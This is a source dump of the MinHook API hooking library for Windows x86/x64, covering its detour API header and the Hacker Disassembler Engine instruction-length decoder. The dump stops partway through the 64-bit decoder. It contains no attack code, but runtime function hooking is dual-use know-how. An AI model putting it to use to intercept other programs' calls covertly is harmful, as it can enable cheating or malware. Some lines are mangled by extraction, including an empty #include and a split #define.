-------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2016 Tsuda Kageyu. 4 | * All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER 20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #pragma once 30 | 31 | #if !(defined _M_IX86) && !(defined _M_X64) 32 | #error MinHook supports only x86 and x64 systems. 33 | #endif 34 | 35 | #include 36 | 37 | // MinHook Error Codes. 38 | typedef enum MH_STATUS 39 | { 40 | // Unknown error. Should not be returned. 41 | MH_UNKNOWN = -1, 42 | 43 | // Successful. 
44 | MH_OK = 0, 45 | 46 | // MinHook is already initialized. 47 | MH_ERROR_ALREADY_INITIALIZED, 48 | 49 | // MinHook is not initialized yet, or already uninitialized. 50 | MH_ERROR_NOT_INITIALIZED, 51 | 52 | // The hook for the specified target function is already created. 53 | MH_ERROR_ALREADY_CREATED, 54 | 55 | // The hook for the specified target function is not created yet. 56 | MH_ERROR_NOT_CREATED, 57 | 58 | // The hook for the specified target function is already enabled. 59 | MH_ERROR_ENABLED, 60 | 61 | // The hook for the specified target function is not enabled yet, or already 62 | // disabled. 63 | MH_ERROR_DISABLED, 64 | 65 | // The specified pointer is invalid. It points the address of non-allocated 66 | // and/or non-executable region. 67 | MH_ERROR_NOT_EXECUTABLE, 68 | 69 | // The specified target function cannot be hooked. 70 | MH_ERROR_UNSUPPORTED_FUNCTION, 71 | 72 | // Failed to allocate memory. 73 | MH_ERROR_MEMORY_ALLOC, 74 | 75 | // Failed to change the memory protection. 76 | MH_ERROR_MEMORY_PROTECT, 77 | 78 | // The specified module is not loaded. 79 | MH_ERROR_MODULE_NOT_FOUND, 80 | 81 | // The specified function is not found. 82 | MH_ERROR_FUNCTION_NOT_FOUND 83 | } 84 | MH_STATUS; 85 | 86 | // Can be passed as a parameter to MH_EnableHook, MH_DisableHook, 87 | // MH_QueueEnableHook or MH_QueueDisableHook. 88 | #define MH_ALL_HOOKS NULL 89 | 90 | #ifdef __cplusplus 91 | extern "C" { 92 | #endif 93 | 94 | // Initialize the MinHook library. You must call this function EXACTLY ONCE 95 | // at the beginning of your program. 96 | MH_STATUS WINAPI MH_Initialize(VOID); 97 | 98 | // Uninitialize the MinHook library. You must call this function EXACTLY 99 | // ONCE at the end of your program. 100 | MH_STATUS WINAPI MH_Uninitialize(VOID); 101 | 102 | // Creates a Hook for the specified target function, in disabled state. 
103 | // Parameters: 104 | // pTarget [in] A pointer to the target function, which will be 105 | // overridden by the detour function. 106 | // pDetour [in] A pointer to the detour function, which will override 107 | // the target function. 108 | // ppOriginal [out] A pointer to the trampoline function, which will be 109 | // used to call the original target function. 110 | // This parameter can be NULL. 111 | MH_STATUS WINAPI MH_CreateHook(LPVOID pTarget, LPVOID pDetour, LPVOID *ppOriginal); 112 | 113 | // Creates a Hook for the specified API function, in disabled state. 114 | // Parameters: 115 | // pszModule [in] A pointer to the loaded module name which contains the 116 | // target function. 117 | // pszProcName [in] A pointer to the target function name, which will be 118 | // overridden by the detour function. 119 | // pDetour [in] A pointer to the detour function, which will override 120 | // the target function. 121 | // ppOriginal [out] A pointer to the trampoline function, which will be 122 | // used to call the original target function. 123 | // This parameter can be NULL. 124 | MH_STATUS WINAPI MH_CreateHookApi( 125 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal); 126 | 127 | // Creates a Hook for the specified API function, in disabled state. 128 | // Parameters: 129 | // pszModule [in] A pointer to the loaded module name which contains the 130 | // target function. 131 | // pszProcName [in] A pointer to the target function name, which will be 132 | // overridden by the detour function. 133 | // pDetour [in] A pointer to the detour function, which will override 134 | // the target function. 135 | // ppOriginal [out] A pointer to the trampoline function, which will be 136 | // used to call the original target function. 137 | // This parameter can be NULL. 138 | // ppTarget [out] A pointer to the target function, which will be used 139 | // with other functions. 140 | // This parameter can be NULL. 
141 | MH_STATUS WINAPI MH_CreateHookApiEx( 142 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal, LPVOID *ppTarget); 143 | 144 | // Removes an already created hook. 145 | // Parameters: 146 | // pTarget [in] A pointer to the target function. 147 | MH_STATUS WINAPI MH_RemoveHook(LPVOID pTarget); 148 | 149 | // Enables an already created hook. 150 | // Parameters: 151 | // pTarget [in] A pointer to the target function. 152 | // If this parameter is MH_ALL_HOOKS, all created hooks are 153 | // enabled in one go. 154 | MH_STATUS WINAPI MH_EnableHook(LPVOID pTarget); 155 | 156 | // Disables an already created hook. 157 | // Parameters: 158 | // pTarget [in] A pointer to the target function. 159 | // If this parameter is MH_ALL_HOOKS, all created hooks are 160 | // disabled in one go. 161 | MH_STATUS WINAPI MH_DisableHook(LPVOID pTarget); 162 | 163 | // Queues to enable an already created hook. 164 | // Parameters: 165 | // pTarget [in] A pointer to the target function. 166 | // If this parameter is MH_ALL_HOOKS, all created hooks are 167 | // queued to be enabled. 168 | MH_STATUS WINAPI MH_QueueEnableHook(LPVOID pTarget); 169 | 170 | // Queues to disable an already created hook. 171 | // Parameters: 172 | // pTarget [in] A pointer to the target function. 173 | // If this parameter is MH_ALL_HOOKS, all created hooks are 174 | // queued to be disabled. 175 | MH_STATUS WINAPI MH_QueueDisableHook(LPVOID pTarget); 176 | 177 | // Applies all queued changes in one go. 178 | MH_STATUS WINAPI MH_ApplyQueued(VOID); 179 | 180 | // Translates the MH_STATUS to its name as a string. 
181 | const char * WINAPI MH_StatusToString(MH_STATUS status); 182 | 183 | #ifdef __cplusplus 184 | } 185 | #endif 186 | 187 | -------------------------------------------------------------------------------- /MinHook/src/buffer.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2016 Tsuda Kageyu. 4 | * All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER 20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #pragma once 30 | 31 | // Size of each memory slot. 
#ifdef _M_X64
    #define MEMORY_SLOT_SIZE 64
#else
    #define MEMORY_SLOT_SIZE 32
#endif

VOID InitializeBuffer(VOID);
VOID UninitializeBuffer(VOID);
LPVOID AllocateBuffer(LPVOID pOrigin);
VOID FreeBuffer(LPVOID pBuffer);
BOOL IsExecutableAddress(LPVOID pAddress);

--------------------------------------------------------------------------------
/MinHook/src/hde/hde32.c:
--------------------------------------------------------------------------------
/*
 * Hacker Disassembler Engine 32 C
 * Copyright (c) 2008-2009, Vyacheslav Patkov.
 * All rights reserved.
 *
 */

#include "hde32.h"
#include "table32.h"

/*
 * Length-disassemble a single x86 (32-bit) instruction.
 *
 * Parameters:
 *   code  Pointer to the first byte of the instruction. Only read. No buffer
 *         length is passed in, so nothing here bounds the reads: the caller
 *         has to guarantee that every byte the encoding asks for is readable.
 *   hs    Output record. It is zero-filled first, then receives the prefix
 *         bytes, opcode byte(s), ModRM/SIB fields, displacement, immediate
 *         and the F_* flags.
 *
 * Returns hs->len, the number of bytes consumed, clamped to 15. Decoding
 * problems do not change the return convention; they are reported through
 * F_ERROR and the F_ERROR_* detail bits in hs->flags, so callers need to test
 * the flags before trusting the length.
 *
 * NOTE(review): multi-byte fields are fetched with casts such as
 * *(uint16_t *)p on a byte pointer, i.e. unaligned, type-punned loads. That
 * presumably relies on x86 tolerating unaligned access -- confirm before
 * building this for any other target.
 */
unsigned int hde32_disasm(const void *code, hde32s *hs)
{
    uint8_t x, c, *p = (uint8_t *)code, cflags, opcode, pref = 0;
    uint8_t *ht = hde32_table, m_mod, m_reg, m_rm, disp_size = 0;

    // Avoid using memset to reduce the footprint.
#ifndef _MSC_VER
    memset((LPBYTE)hs, 0, sizeof(hde32s));
#else
    __stosb((LPBYTE)hs, 0, sizeof(hde32s));
#endif

    /*
     * Prefix scan: consume at most 16 bytes, recording each prefix byte in hs
     * and its PRE_* bit in pref. The first non-prefix byte leaves the loop
     * with c holding it. If all 16 bytes are prefixes the loop simply runs
     * out and c (the last prefix) is then treated as the opcode; that input
     * has already consumed more than 15 bytes, so the length check at the end
     * flags it.
     */
    for (x = 16; x; x--)
        switch (c = *p++) {
            case 0xf3:
                hs->p_rep = c;
                pref |= PRE_F3;
                break;
            case 0xf2:
                hs->p_rep = c;
                pref |= PRE_F2;
                break;
            case 0xf0:
                hs->p_lock = c;
                pref |= PRE_LOCK;
                break;
            case 0x26: case 0x2e: case 0x36:
            case 0x3e: case 0x64: case 0x65:
                hs->p_seg = c;
                pref |= PRE_SEG;
                break;
            case 0x66:
                hs->p_66 = c;
                pref |= PRE_66;
                break;
            case 0x67:
                hs->p_67 = c;
                pref |= PRE_67;
                break;
            default:
                goto pref_done;
        }
  pref_done:

    /* PRE_F2..PRE_SEG (table32.h) shifted left by 23 are exactly the
     * F_PREFIX_* bits of hde32.h. */
    hs->flags = (uint32_t)pref << 23;

    /* PRE_NONE is only used for the table checks below, so it is added after
     * the flags were derived. */
    if (!pref)
        pref |= PRE_NONE;

    if ((hs->opcode = c) == 0x0f) {
        /* 0x0F escape: take the second opcode byte and move ht to the table
         * region at DELTA_OPCODES. */
        hs->opcode2 = c = *p++;
        ht += DELTA_OPCODES;
    } else if (c >= 0xa0 && c <= 0xa3) {
        /* For opcodes 0xA0..0xA3 PRE_66 is rewritten to mirror PRE_67, so the
         * C_IMM_P66 handling below sizes the operand by the 0x67 prefix. */
        if (pref & PRE_67)
            pref |= PRE_66;
        else
            pref &= ~PRE_66;
    }

    /* Two-level lookup: ht[opcode / 4] selects a row, opcode % 4 the entry. */
    opcode = c;
    cflags = ht[ht[opcode / 4] + (opcode % 4)];

    if (cflags == C_ERROR) {
        hs->flags |= F_ERROR | F_ERROR_OPCODE;
        cflags = 0;
        /* (opcode & -3) == 0x24 matches 0x24 and 0x26; for those cflags
         * becomes 1 (C_MODRM), so a ModRM byte is still decoded. */
        if ((opcode & -3) == 0x24)
            cflags++;
    }

    x = 0;
    if (cflags & C_GROUP) {
        /* Group entry: the low 7 bits of cflags are an offset from ht to a
         * 16-bit record. Its low 8 bits replace cflags, its high 8 bits go to
         * x, a mask that is tested against ModRM.reg below. */
        uint16_t t;
        t = *(uint16_t *)(ht + (cflags & 0x7f));
        cflags = (uint8_t)t;
        x = (uint8_t)(t >> 8);
    }

    if (hs->opcode2) {
        /* Two-byte opcodes: a second table at DELTA_PREFIXES holds the prefix
         * bits that make this opcode an error. */
        ht = hde32_table + DELTA_PREFIXES;
        if (ht[ht[opcode / 4] + (opcode % 4)] & pref)
            hs->flags |= F_ERROR | F_ERROR_OPCODE;
    }

    if (cflags & C_MODRM) {
        /* Split ModRM into mod (bits 7-6), reg (bits 5-3) and rm (bits 2-0). */
        hs->flags |= F_MODRM;
        hs->modrm = c = *p++;
        hs->modrm_mod = m_mod = c >> 6;
        hs->modrm_rm = m_rm = c & 7;
        hs->modrm_reg = m_reg = (c & 0x3f) >> 3;

        /* Bit (7 - m_reg) of the group mask set means this reg value is not
         * a valid member of the group. */
        if (x && ((x << m_reg) & 0x80))
            hs->flags |= F_ERROR | F_ERROR_OPCODE;

        /* One-byte opcodes 0xD9..0xDF: pick a mask byte from the FPU tables
         * (by reg and rm when mod == 3, by opcode and reg otherwise) and flag
         * an opcode error when the selected bit is set. */
        if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) {
            uint8_t t = opcode - 0xd9;
            if (m_mod == 3) {
                ht = hde32_table + DELTA_FPU_MODRM + t*8;
                t = ht[m_reg] << m_rm;
            } else {
                ht = hde32_table + DELTA_FPU_REG;
                t = ht[t] << m_reg;
            }
            if (t & 0x80)
                hs->flags |= F_ERROR | F_ERROR_OPCODE;
        }

        if (pref & PRE_LOCK) {
            if (m_mod == 3) {
                /* LOCK with a register-form ModRM is always rejected. */
                hs->flags |= F_ERROR | F_ERROR_LOCK;
            } else {
                /* Scan the "LOCK allowed" table of 2-byte records
                 * (opcode, reg mask). For one-byte opcodes the low opcode bit
                 * is cleared before comparing. A hit whose mask bit for
                 * m_reg is clear is accepted; a hit with the bit set, or no
                 * hit at all, is a LOCK error. */
                uint8_t *table_end, op = opcode;
                if (hs->opcode2) {
                    ht = hde32_table + DELTA_OP2_LOCK_OK;
                    table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK;
                } else {
                    ht = hde32_table + DELTA_OP_LOCK_OK;
                    table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK;
                    op &= -2;
                }
                for (; ht != table_end; ht++)
                    if (*ht++ == op) {
                        if (!((*ht << m_reg) & 0x80))
                            goto no_lock_error;
                        else
                            break;
                    }
                hs->flags |= F_ERROR | F_ERROR_LOCK;
              no_lock_error:
                ;
            }
        }

        /* Operand checks that depend on ModRM.reg. For 0F 20..0F 23 m_mod is
         * forced to 3 first, so no displacement is decoded for them below. */
        if (hs->opcode2) {
            switch (opcode) {
                case 0x20: case 0x22:
                    m_mod = 3;
                    if (m_reg > 4 || m_reg == 1)
                        goto error_operand;
                    else
                        goto no_error_operand;
                case 0x21: case 0x23:
                    m_mod = 3;
                    if (m_reg == 4 || m_reg == 5)
                        goto error_operand;
                    else
                        goto no_error_operand;
            }
        } else {
            switch (opcode) {
                case 0x8c:
                    if (m_reg > 5)
                        goto error_operand;
                    else
                        goto no_error_operand;
                case 0x8e:
                    if (m_reg == 1 || m_reg > 5)
                        goto error_operand;
                    else
                        goto no_error_operand;
            }
        }

        if (m_mod == 3) {
            /* Register form: scan the "memory operand only" table of 3-byte
             * records (opcode, prefix mask, reg mask). It is an operand error
             * when the prefix mask matches pref and the mask bit for m_reg is
             * clear. */
            uint8_t *table_end;
            if (hs->opcode2) {
                ht = hde32_table + DELTA_OP2_ONLY_MEM;
                table_end = ht + sizeof(hde32_table) - DELTA_OP2_ONLY_MEM;
            } else {
                ht = hde32_table + DELTA_OP_ONLY_MEM;
                table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM;
            }
            for (; ht != table_end; ht += 2)
                if (*ht++ == opcode) {
                    if (*ht++ & pref && !((*ht << m_reg) & 0x80))
                        goto error_operand;
                    else
                        break;
                }
            goto no_error_operand;
        } else if (hs->opcode2) {
            /* Memory form of a two-byte opcode: these opcode/prefix
             * combinations are rejected. */
            switch (opcode) {
                case 0x50: case 0xd7: case 0xf7:
                    if (pref & (PRE_NONE | PRE_66))
                        goto error_operand;
                    break;
                case 0xd6:
                    if (pref & (PRE_F2 | PRE_F3))
                        goto error_operand;
                    break;
                case 0xc5:
                    goto error_operand;
            }
            goto no_error_operand;
        } else
            goto no_error_operand;

      error_operand:
        hs->flags |= F_ERROR | F_ERROR_OPERAND;
      no_error_operand:

        /* Read the byte after ModRM as a SIB candidate. This read happens
         * even when the instruction has no SIB byte; p is stepped back by the
         * p-- further down. */
        c = *p++;
        /* Opcodes 0xF6 / 0xF7 take an immediate only when ModRM.reg is 0 or
         * 1. */
        if (m_reg <= 1) {
            if (opcode == 0xf6)
                cflags |= C_IMM8;
            else if (opcode == 0xf7)
                cflags |= C_IMM_P66;
        }

        /* Displacement size from mod; the 0x67 prefix selects the 16-bit
         * addressing rules (rm == 6 / 2-byte displacement). */
        switch (m_mod) {
            case 0:
                if (pref & PRE_67) {
                    if (m_rm == 6)
                        disp_size = 2;
                } else
                    if (m_rm == 5)
                        disp_size = 4;
                break;
            case 1:
                disp_size = 1;
                break;
            case 2:
                disp_size = 2;
                if (!(pref & PRE_67))
                    disp_size <<= 1;
        }

        /* SIB byte: memory form with rm == 4 and no 0x67 prefix. A base of 5
         * with mod 0 or 2 carries a 4-byte displacement. */
        if (m_mod != 3 && m_rm == 4 && !(pref & PRE_67)) {
            hs->flags |= F_SIB;
            p++;
            hs->sib = c;
            hs->sib_scale = c >> 6;
            hs->sib_index = (c & 0x3f) >> 3;
            if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1))
                disp_size = 4;
        }

        /* Undo the SIB look-ahead: p now points at the displacement (or at
         * whatever follows ModRM/SIB when there is none). */
        p--;
        switch (disp_size) {
            case 1:
                hs->flags |= F_DISP8;
                hs->disp.disp8 = *p;
                break;
            case 2:
                hs->flags |= F_DISP16;
                hs->disp.disp16 = *(uint16_t *)p;
                break;
            case 4:
                hs->flags |= F_DISP32;
                hs->disp.disp32 = *(uint32_t *)p;
        }
        p += disp_size;
    } else if (pref & PRE_LOCK)
        /* LOCK on an instruction without ModRM is an error. */
        hs->flags |= F_ERROR | F_ERROR_LOCK;

    /* Immediate whose width depends on the 0x66 prefix: 16 bits with it,
     * 32 bits without. Combined with C_REL32 it is a relative target. */
    if (cflags & C_IMM_P66) {
        if (cflags & C_REL32) {
            if (pref & PRE_66) {
                hs->flags |= F_IMM16 | F_RELATIVE;
                hs->imm.imm16 = *(uint16_t *)p;
                p += 2;
                goto disasm_done;
            }
            goto rel32_ok;
        }
        if (pref & PRE_66) {
            hs->flags |= F_IMM16;
            hs->imm.imm16 = *(uint16_t *)p;
            p += 2;
        } else {
            hs->flags |= F_IMM32;
            hs->imm.imm32 = *(uint32_t *)p;
            p += 4;
        }
    }

    /* Additional 16-bit immediate. When hs->imm is already occupied (F_IMM32
     * or F_IMM16 set above) the value is stored in hs->disp.disp16 instead,
     * so the disp union can hold a second immediate. */
    if (cflags & C_IMM16) {
        if (hs->flags & F_IMM32) {
            hs->flags |= F_IMM16;
            hs->disp.disp16 = *(uint16_t *)p;
        } else if (hs->flags & F_IMM16) {
            hs->flags |= F_2IMM16;
            hs->disp.disp16 = *(uint16_t *)p;
        } else {
            hs->flags |= F_IMM16;
            hs->imm.imm16 = *(uint16_t *)p;
        }
        p += 2;
    }
    if (cflags & C_IMM8) {
        hs->flags |= F_IMM8;
        hs->imm.imm8 = *p++;
    }

    /* Relative operands are stored in hs->imm and marked F_RELATIVE. */
    if (cflags & C_REL32) {
      rel32_ok:
        hs->flags |= F_IMM32 | F_RELATIVE;
        hs->imm.imm32 = *(uint32_t *)p;
        p += 4;
    } else if (cflags & C_REL8) {
        hs->flags |= F_IMM8 | F_RELATIVE;
        hs->imm.imm8 = *p++;
    }

  disasm_done:

    /* The length limit is enforced only here, after every read has already
     * been performed; an over-long encoding is reported as F_ERROR_LENGTH
     * with len clamped to 15. */
    if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) {
        hs->flags |= F_ERROR | F_ERROR_LENGTH;
        hs->len = 15;
    }

    return (unsigned int)hs->len;
}

--------------------------------------------------------------------------------
/MinHook/src/hde/hde32.h:
--------------------------------------------------------------------------------
/*
 * Hacker Disassembler Engine 32
 * Copyright (c) 2006-2009, Vyacheslav Patkov.
 * All rights reserved.
 *
 * hde32.h: C/C++ header file
 *
 */

#ifndef _HDE32_H_
#define _HDE32_H_

/* stdint.h - C99 standard header
 * http://en.wikipedia.org/wiki/stdint.h
 *
 * if your compiler doesn't contain "stdint.h" header (for
 * example, Microsoft Visual C++), you can download file:
 * http://www.azillionmonkeys.com/qed/pstdint.h
 * and change next line to:
 * #include "pstdint.h"
 */
#include "pstdint.h"

/* Bits of hde32s.flags, set by hde32_disasm(). */
#define F_MODRM         0x00000001
#define F_SIB           0x00000002
#define F_IMM8          0x00000004
#define F_IMM16         0x00000008
#define F_IMM32         0x00000010
#define F_DISP8         0x00000020
#define F_DISP16        0x00000040
#define F_DISP32        0x00000080
#define F_RELATIVE      0x00000100
#define F_2IMM16        0x00000800
#define F_ERROR         0x00001000
#define F_ERROR_OPCODE  0x00002000
#define F_ERROR_LENGTH  0x00004000
#define F_ERROR_LOCK    0x00008000
#define F_ERROR_OPERAND 0x00010000
#define F_PREFIX_REPNZ  0x01000000
#define F_PREFIX_REPX   0x02000000
#define F_PREFIX_REP    0x03000000
#define F_PREFIX_66     0x04000000
#define F_PREFIX_67     0x08000000
#define F_PREFIX_LOCK   0x10000000
#define F_PREFIX_SEG    0x20000000
#define F_PREFIX_ANY    0x3f000000

/* Prefix byte values as they appear in the instruction stream. */
#define PREFIX_SEGMENT_CS   0x2e
#define PREFIX_SEGMENT_SS   0x36
#define PREFIX_SEGMENT_DS   0x3e
#define PREFIX_SEGMENT_ES   0x26
#define PREFIX_SEGMENT_FS   0x64
#define PREFIX_SEGMENT_GS   0x65
#define PREFIX_LOCK         0xf0
#define PREFIX_REPNZ        0xf2
#define PREFIX_REPX
0xf3 /* value of the "#define PREFIX_REPX" that starts on the previous line of this listing */
#define PREFIX_OPERAND_SIZE 0x66
#define PREFIX_ADDRESS_SIZE 0x67

#pragma pack(push,1)

/* Result record filled by hde32_disasm(); byte-packed (pack(push,1)). */
typedef struct {
    uint8_t len;        /* bytes consumed, clamped to 15 by hde32_disasm() */
    uint8_t p_rep;      /* 0xf2 or 0xf3 prefix byte if one was seen, else 0 */
    uint8_t p_lock;     /* 0xf0 prefix byte if seen */
    uint8_t p_seg;      /* segment-override prefix byte if seen */
    uint8_t p_66;       /* 0x66 prefix byte if seen */
    uint8_t p_67;       /* 0x67 prefix byte if seen */
    uint8_t opcode;     /* first opcode byte */
    uint8_t opcode2;    /* second opcode byte when opcode is 0x0f */
    uint8_t modrm;      /* raw ModRM byte, valid when F_MODRM is set */
    uint8_t modrm_mod;  /* ModRM bits 7-6 */
    uint8_t modrm_reg;  /* ModRM bits 5-3 */
    uint8_t modrm_rm;   /* ModRM bits 2-0 */
    uint8_t sib;        /* raw SIB byte, valid when F_SIB is set */
    uint8_t sib_scale;  /* SIB bits 7-6 */
    uint8_t sib_index;  /* SIB bits 5-3 */
    uint8_t sib_base;   /* SIB bits 2-0 */
    union {
        uint8_t imm8;
        uint16_t imm16;
        uint32_t imm32;
    } imm;              /* immediate or relative operand; see F_IMM* / F_RELATIVE */
    union {
        uint8_t disp8;
        uint16_t disp16;
        uint32_t disp32;
    } disp;             /* displacement; disp16 also receives a second 16-bit
                           immediate when hde32_disasm() finds imm occupied */
    uint32_t flags;     /* F_* bits */
} hde32s;

#pragma pack(pop)

#ifdef __cplusplus
extern "C" {
#endif

/* __cdecl */
unsigned int hde32_disasm(const void *code, hde32s *hs);

#ifdef __cplusplus
}
#endif

#endif /* _HDE32_H_ */

--------------------------------------------------------------------------------
/MinHook/src/hde/hde64.c:
--------------------------------------------------------------------------------
/*
 * Hacker Disassembler Engine 64 C
 * Copyright (c) 2008-2009, Vyacheslav Patkov.
 * All rights reserved.
 *
 */

#include "hde64.h"
#include "table64.h"

/*
 * Length-disassemble a single x86-64 instruction.
 *
 * Parameters:
 *   code  Pointer to the first byte of the instruction. Only read. No buffer
 *         length is passed in, so nothing here bounds the reads: the caller
 *         has to guarantee that every byte the encoding asks for is readable.
 *   hs    Output record. It is zero-filled first, then receives the prefix
 *         bytes, REX bits, opcode byte(s), ModRM/SIB fields, displacement,
 *         immediate and the F_* flags.
 *
 * Returns hs->len, the number of bytes consumed, clamped to 15. Decoding
 * problems are reported through F_ERROR and the F_ERROR_* detail bits in
 * hs->flags, not through the return value, so callers need to test the flags
 * before trusting the length.
 *
 * NOTE(review): multi-byte fields are fetched with casts such as
 * *(uint64_t *)p on a byte pointer, i.e. unaligned, type-punned loads. That
 * presumably relies on x86-64 tolerating unaligned access -- confirm before
 * building this for any other target.
 */
unsigned int hde64_disasm(const void *code, hde64s *hs)
{
    uint8_t x, c, *p = (uint8_t *)code, cflags, opcode, pref = 0;
    uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0;
    uint8_t op64 = 0;   /* non-zero: a C_IMM_P66 immediate is 8 bytes wide */

    // Avoid using memset to reduce the footprint.
#ifndef _MSC_VER
    memset((LPBYTE)hs, 0, sizeof(hde64s));
#else
    __stosb((LPBYTE)hs, 0, sizeof(hde64s));
#endif

    /*
     * Prefix scan: consume at most 16 bytes, recording each prefix byte in hs
     * and its PRE_* bit in pref. The first non-prefix byte leaves the loop
     * with c holding it. If all 16 bytes are prefixes the loop simply runs
     * out and c (the last prefix) is carried forward; that input has already
     * consumed more than 15 bytes, so the length check at the end flags it.
     */
    for (x = 16; x; x--)
        switch (c = *p++) {
            case 0xf3:
                hs->p_rep = c;
                pref |= PRE_F3;
                break;
            case 0xf2:
                hs->p_rep = c;
                pref |= PRE_F2;
                break;
            case 0xf0:
                hs->p_lock = c;
                pref |= PRE_LOCK;
                break;
            case 0x26: case 0x2e: case 0x36:
            case 0x3e: case 0x64: case 0x65:
                hs->p_seg = c;
                pref |= PRE_SEG;
                break;
            case 0x66:
                hs->p_66 = c;
                pref |= PRE_66;
                break;
            case 0x67:
                hs->p_67 = c;
                pref |= PRE_67;
                break;
            default:
                goto pref_done;
        }
  pref_done:

    /* PRE_F2..PRE_SEG (table64.h) shifted left by 23 are exactly the
     * F_PREFIX_* bits of hde64.h. */
    hs->flags = (uint32_t)pref << 23;

    /* PRE_NONE is only used for the table checks below, so it is added after
     * the flags were derived. */
    if (!pref)
        pref |= PRE_NONE;

    /* A byte in 0x40..0x4F at this position is taken as a REX prefix. Its
     * W/R/X/B bits are stored individually; hs->rex itself is not written
     * anywhere in this function. */
    if ((c & 0xf0) == 0x40) {
        hs->flags |= F_PREFIX_REX;
        /* REX.W followed by an opcode in 0xB8..0xBF selects the 8-byte
         * immediate form (op64). */
        if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8)
            op64++;
        hs->rex_r = (c & 7) >> 2;
        hs->rex_x = (c & 3) >> 1;
        hs->rex_b = c & 1;
        /* A second byte in the REX range right after the first is an opcode
         * error. The jump skips the table lookup, and hs->opcode keeps the 0
         * it got from the zero-fill. */
        if (((c = *p++) & 0xf0) == 0x40) {
            opcode = c;
            goto error_opcode;
        }
    }

    if ((hs->opcode = c) == 0x0f) {
        /* 0x0F escape: take the second opcode byte and move ht to the table
         * region at DELTA_OPCODES. */
        hs->opcode2 = c = *p++;
        ht += DELTA_OPCODES;
    } else if (c >= 0xa0 && c <= 0xa3) {
        /* Opcodes 0xA0..0xA3: the operand is 8 bytes wide by default (op64);
         * PRE_66 is rewritten to mirror PRE_67 for the sizing logic below. */
        op64++;
        if (pref & PRE_67)
            pref |= PRE_66;
        else
            pref &= ~PRE_66;
    }

    /* Two-level lookup: ht[opcode / 4] selects a row, opcode % 4 the entry. */
    opcode = c;
    cflags = ht[ht[opcode / 4] + (opcode % 4)];

    if (cflags == C_ERROR) {
      error_opcode:
        hs->flags |= F_ERROR | F_ERROR_OPCODE;
        cflags = 0;
        /* (opcode & -3) == 0x24 matches 0x24 and 0x26; for those cflags
         * becomes 1 (C_MODRM), so a ModRM byte is still decoded. */
        if ((opcode & -3) == 0x24)
            cflags++;
    }

    x = 0;
    if (cflags & C_GROUP) {
        /* Group entry: the low 7 bits of cflags are an offset from ht to a
         * 16-bit record. Its low 8 bits replace cflags, its high 8 bits go to
         * x, a mask that is tested against ModRM.reg below. */
        uint16_t t;
        t = *(uint16_t *)(ht + (cflags & 0x7f));
        cflags = (uint8_t)t;
        x = (uint8_t)(t >> 8);
